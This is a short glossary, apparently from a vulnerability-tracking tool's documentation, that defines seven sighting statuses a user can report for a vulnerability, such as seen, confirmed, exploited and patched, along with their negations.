- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.